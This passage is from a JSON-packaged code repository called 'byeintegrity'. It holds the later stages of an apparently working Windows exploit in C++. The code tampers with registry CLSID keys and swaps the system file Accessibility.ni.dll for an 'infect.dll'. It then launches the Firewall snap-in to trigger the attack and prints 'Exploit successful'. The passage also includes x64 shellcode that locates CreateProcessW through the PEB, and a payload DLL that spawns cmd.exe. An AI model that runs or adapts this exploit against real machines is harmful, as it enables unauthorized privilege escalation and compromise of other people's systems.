 *\tAlso delete the dummy Desktop.ini we copied over there.\n\t  */\n\n\tif ((status = RegCreateKeyExW(\n\t\tHKEY_CURRENT_USER, L\"SOFTWARE\\\\Classes\\\\CLSID\\\\{1D2680C9-0E2A-469d-B787-065558BC7D43}\", 0, nullptr,\n\t\tREG_OPTION_NON_VOLATILE, KEY_SET_VALUE, nullptr, &userKey, &openResult)))\n\t{\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"RegCreateKeyExW() (2) failed. Error \" << status << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tif ((status = RegDeleteKeyExW(userKey, L\"Server\", KEY_WOW64_64KEY, 0)))\n\t{\n\t\tRegCloseKey(userKey);\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"RegDeleteKeyExW() (0) failed. 
Error \" << status << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tRegCloseKey(userKey);\n\tif ((status = RegDeleteKeyExW(\n\t\tHKEY_CURRENT_USER, L\"SOFTWARE\\\\Classes\\\\CLSID\\\\{1D2680C9-0E2A-469d-B787-065558BC7D43}\", KEY_WOW64_64KEY, 0)))\n\t{\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"RegDeleteKeyExW() (1) failed. Error \" << status << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\t// Launch the delete process\n\n\texplorer += L\"\\\\Desktop.ini\";\n\tlaunchCmd += explorer;\n\tif (!CreateProcessW(argv[0], const_cast<LPWSTR>(launchCmd.c_str()), nullptr, nullptr, FALSE, 0, nullptr, nullptr,\n\t\t&startupInfo, &processInfo))\n\t{\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"CreateProcessW() (0) failed. Error: \" << GetLastError() << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tWaitForSingleObject(processInfo.hProcess, INFINITE);\n\tGetExitCodeProcess(processInfo.hProcess, &exitCode);\n\tCloseHandle(processInfo.hThread);\n\tCloseHandle(processInfo.hProcess);\n\n\tif (exitCode)\n\t{\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"The child process failed to delete the target file.\\n\";\n\t\treturn EXIT_FAILURE;\n\t}\n\n\t/*\n\t *\tEND STAGE 6\n\t */\n\n\t /*\n\t  *\tSTAGE 7\n\t  *\tDelete the original Accessibility.ni.dll file and move our inject.dll file with the correct name over there.\n\t  */\n\nDoAttackDirect:\n\tresult = SHCreateItemFromParsingName(fullPath.c_str(), nullptr, IID_IShellItem,\n\t\treinterpret_cast<void**>(&existingFile));\n\tif (FAILED(result))\n\t{\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"SHCreateItemFromParsingName() (2) failed. 
HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tfullPath = fullPath.substr(0, fullPath.size() - std::wcslen(L\"Accessibility.ni.dll\"));\n\tresult = SHCreateItemFromParsingName(fullPath.c_str(), nullptr, IID_IShellItem, reinterpret_cast<void**>(&targetFolder));\n\tif (FAILED(result))\n\t{\n\t\texistingFile->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"SHCreateItemFromParsingName() (3) failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\trequiredSize = static_cast<ULONG_PTR>(GetCurrentDirectoryW(0, nullptr));\n\tcurrentDirectory = new WCHAR[requiredSize + 11];\n\tGetCurrentDirectoryW(static_cast<DWORD>(requiredSize), currentDirectory);\n\n\twcscat_s(currentDirectory, requiredSize + 11, L\"\\\\infect.dll\");\n\tresult = SHCreateItemFromParsingName(currentDirectory, nullptr, IID_IShellItem,\n\t\treinterpret_cast<void**>(&targetFile));\n\tif (FAILED(result))\n\t{\n\t\tdelete[] currentDirectory;\n\t\ttargetFolder->Release();\n\t\texistingFile->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"SHCreateItemFromParsingName() (4) failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tdelete[] currentDirectory;\n\n\tresult = fileOperation->RenameItem(existingFile, L\"Accessibility.ni.dll.bak\", nullptr);\n\tif (FAILED(result))\n\t{\n\t\ttargetFile->Release();\n\t\ttargetFolder->Release();\n\t\texistingFile->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"IFileOperation::RenameItem() failed. 
HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tresult = fileOperation->MoveItem(targetFile, targetFolder, L\"Accessibility.ni.dll\", nullptr);\n\tif (FAILED(result))\n\t{\n\t\ttargetFile->Release();\n\t\ttargetFolder->Release();\n\t\texistingFile->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"IFileOperation::MoveItem() failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tresult = fileOperation->PerformOperations();\n\tif (FAILED(result))\n\t{\n\t\ttargetFile->Release();\n\t\ttargetFolder->Release();\n\t\texistingFile->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\tstd::cout << \"IFileOperation::PerformOperations() (1) failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\ttargetFile->Release();\n\ttargetFolder->Release();\n\texistingFile->Release();\n\tfileOperation->Release();\n\tCoUninitialize();\n\n\t/*\n\t *\tEND STAGE 7\n\t */\n\n\t /*\n\t  *\tSTAGE 8\n\t  *\tLaunch the Firewall Snap-in via WF.msc to execute the exploit and do the attack.\n\t  *\tAlso delete infect.dll and the dummy Desktop.ini file.\n\t  */\n\n\t  /* Launch the launch process. This is for Windows 7, because it seems like messing with the PEB causes\n\t   * ShellExecute(Ex) to run out of memory. Makes no sense at all but that's how it is. 
*/\n\n\tDeleteFileW(L\"infect.dll\");\n\tDeleteFileW(L\"byeinteg_files\\\\Desktop.ini\");\n\tRemoveDirectoryW(L\"byeinteg_files\");\n\tif (!CreateProcessW(argv[0], const_cast<LPWSTR>(L\"launch\"), nullptr, nullptr, FALSE, 0, nullptr, nullptr,\n\t\t&startupInfo, &processInfo))\n\t{\n\t\tstd::cout << \"CreateProcessW() (1) Error: \" << GetLastError() << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tWaitForSingleObject(processInfo.hProcess, INFINITE);\n\tGetExitCodeProcess(processInfo.hProcess, &exitCode);\n\tCloseHandle(processInfo.hProcess);\n\tCloseHandle(processInfo.hThread);\n\n\tif (exitCode)\n\t{\n\t\tstd::cout << \"The child process failed to launch mmc.exe\\n\";\n\t\treturn EXIT_FAILURE;\n\t}\n\n\t/*\n\t *\tEND STAGE 8\n\t */\n\n\t // Finally, we can print success and exit.\n\n\tSetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), 15);\n\n\tstd::cout << \"[+] \";\n\n\tSetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), 14);\n\n\tstd::cout << \"*** Exploit successful.\\n\\n\";\n\n\tSetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), 7);\n\n\treturn 0;\n}"
  },
  {
    "path": "byeintegrity/shellcode.txt",
    "content": "cmp dl, 1\njne exitNow\npush rdi\nsub rsp, 224\nlea rax, qword ptr 112[rsp]\nmov rdi, rax\nxor eax, eax\nmov ecx, 104\nrep stosb\nmov dword ptr 112[rsp], 104\nlea rax, qword ptr 80[rsp]\nmov qword ptr [rsp+72], rax\nlea rax, qword ptr 112[rsp]\nmov qword ptr [rsp+64], rax\nmov qword ptr [rsp+56], 0\nmov qword ptr [rsp+48], 0\nmov dword ptr [rsp+40], 0\nmov dword ptr [rsp+32], 0\nxor r9d, r9d\nxor r8d, r8d\nxor edx, edx\nlea rcx, [rip + 0x41]\n\nmov rax, QWORD PTR gs:[0x30]\nadd rax, 0x60\nmov rax, [rax]\nadd rax, 0x18\nmov rax, [rax]\nmov rax, [rax + 0x10]\nmov rax, [rax]\nmov rax, [rax]\nmov rax, [rax + 0x30]\nxor r12, r12\nmov r12d, 0xdeadbeef \nadd rax, r12\t;now RAX holds the address of CreateProcessW\n\ncall rax\nadd rsp, 224\npop rdi\nexitNow:\nxor rax, rax\nmov al, 1\nret"
  },
  {
    "path": "byeintegrity.sln",
    "content": "﻿\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 17\nVisualStudioVersion = 17.0.31903.59\nMinimumVisualStudioVersion = 10.0.40219.1\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"byeintegrity\", \"byeintegrity\\byeintegrity.vcxproj\", \"{E1F82946-041D-49F3-860B-7CF7EC2C9620}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"AUXGen\", \"AUXGen\\AUXGen.vcxproj\", \"{B4192E53-737A-409E-96AB-7013F6863072}\"\nEndProject\nProject(\"{2150E333-8FDC-42A3-9474-1A3956D46DE8}\") = \"2021 Update\", \"2021 Update\", \"{FC0FB17B-8AB3-4A56-B1BC-A43C00F50A53}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"ByeIntegrity2021\", \"ByeIntegrity2021\\ByeIntegrity2021.vcxproj\", \"{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"payload\", \"payload\\payload.vcxproj\", \"{24A262C7-3655-44A2-AEC5-05D645194830}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|Any CPU = Debug|Any CPU\n\t\tDebug|x64 = Debug|x64\n\t\tDebug|x86 = Debug|x86\n\t\tRelease|Any CPU = Release|Any CPU\n\t\tRelease|x64 = Release|x64\n\t\tRelease|x86 = Release|x86\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Debug|Any CPU.ActiveCfg = Debug|x64\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Debug|Any CPU.Build.0 = Debug|x64\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Debug|x64.Build.0 = Debug|x64\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Debug|x86.Build.0 = Debug|Win32\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Release|Any CPU.ActiveCfg = Release|x64\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Release|Any CPU.Build.0 = 
Release|x64\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Release|x64.ActiveCfg = Release|x64\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Release|x64.Build.0 = Release|x64\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Release|x86.ActiveCfg = Release|Win32\n\t\t{E1F82946-041D-49F3-860B-7CF7EC2C9620}.Release|x86.Build.0 = Release|Win32\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Debug|Any CPU.ActiveCfg = Debug|x64\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Debug|Any CPU.Build.0 = Debug|x64\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Debug|x64.Build.0 = Debug|x64\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Debug|x86.Build.0 = Debug|Win32\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Release|Any CPU.ActiveCfg = Release|x64\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Release|Any CPU.Build.0 = Release|x64\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Release|x64.ActiveCfg = Release|x64\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Release|x64.Build.0 = Release|x64\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Release|x86.ActiveCfg = Release|Win32\n\t\t{B4192E53-737A-409E-96AB-7013F6863072}.Release|x86.Build.0 = Release|Win32\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Debug|Any CPU.ActiveCfg = Debug|x64\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Debug|Any CPU.Build.0 = Debug|x64\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Debug|x64.Build.0 = Debug|x64\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Debug|x86.Build.0 = Debug|Win32\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Release|Any CPU.ActiveCfg = Release|x64\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Release|Any CPU.Build.0 = Release|x64\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Release|x64.ActiveCfg = 
Release|x64\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Release|x64.Build.0 = Release|x64\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Release|x86.ActiveCfg = Release|Win32\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017}.Release|x86.Build.0 = Release|Win32\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Debug|Any CPU.ActiveCfg = Debug|x64\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Debug|Any CPU.Build.0 = Debug|x64\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Debug|x64.Build.0 = Debug|x64\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Debug|x86.Build.0 = Debug|Win32\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Release|Any CPU.ActiveCfg = Release|x64\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Release|Any CPU.Build.0 = Release|x64\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Release|x64.ActiveCfg = Release|x64\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Release|x64.Build.0 = Release|x64\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Release|x86.ActiveCfg = Release|Win32\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830}.Release|x86.Build.0 = Release|Win32\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\n\tGlobalSection(NestedProjects) = preSolution\n\t\t{B4192E53-737A-409E-96AB-7013F6863072} = {FC0FB17B-8AB3-4A56-B1BC-A43C00F50A53}\n\t\t{7CDC9C5F-6DEE-4D33-A8AD-610194B1A017} = {FC0FB17B-8AB3-4A56-B1BC-A43C00F50A53}\n\t\t{24A262C7-3655-44A2-AEC5-05D645194830} = {FC0FB17B-8AB3-4A56-B1BC-A43C00F50A53}\n\tEndGlobalSection\n\tGlobalSection(ExtensibilityGlobals) = postSolution\n\t\tSolutionGuid = {93AE96B8-1103-4400-8754-E4EC1D26AA01}\n\tEndGlobalSection\nEndGlobal\n"
  },
  {
    "path": "payload/payload.cpp",
    "content": "#include <Windows.h>\n#include <ShlObj.h>\n#include <string>\n\n__declspec(noreturn) void WINAPI DllMain(\n\tHMODULE,\n\tDWORD,\n\tLPVOID\n)\n{\n\tPWSTR system32Ptr;\n\tif (FAILED(SHGetKnownFolderPath(FOLDERID_System, 0, nullptr, &system32Ptr)))\n\t\tExitProcess(1);\n\n\tstd::wstring cmdPath{ system32Ptr };\n\tCoTaskMemFree(system32Ptr);\n\tcmdPath += L\"\\\\cmd.exe\";\n\n\tPROCESS_INFORMATION pi;\n\tSTARTUPINFOW si{};\n\tsi.cb = sizeof STARTUPINFO;\n\n\tif (!CreateProcessW(\n\t\tcmdPath.c_str(),\n\t\tnullptr,\n\t\tnullptr,\n\t\tnullptr,\n\t\tFALSE,\n\t\t0,\n\t\tnullptr,\n\t\tnullptr,\n\t\t&si,\n\t\t&pi\n\t))\n\t\tExitProcess(1);\n\n\tCloseHandle(pi.hThread);\n\tCloseHandle(pi.hProcess);\n\n\tExitProcess(0);\n}"
  },
  {
    "path": "payload/payload.vcxproj",
    "content": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|Win32\">\n      <Configuration>Debug</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|Win32\">\n      <Configuration>Release</Configuration>\n      <Platform>Win32</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <VCProjectVersion>16.0</VCProjectVersion>\n    <Keyword>Win32Proj</Keyword>\n    <ProjectGuid>{24a262c7-3655-44a2-aec5-05d645194830}</ProjectGuid>\n    <RootNamespace>payload</RootNamespace>\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup 
Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>DynamicLibrary</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v143</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"Shared\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" 
Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|Win32'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  
<ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level3</WarningLevel>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <SDLCheck>true</SDLCheck>\n      <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <ConformanceMode>true</ConformanceMode>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <ClCompile Include=\"payload.cpp\" />\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "payload/payload.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <ClCompile Include=\"payload.cpp\" />\n  </ItemGroup>\n</Project>"
  }
]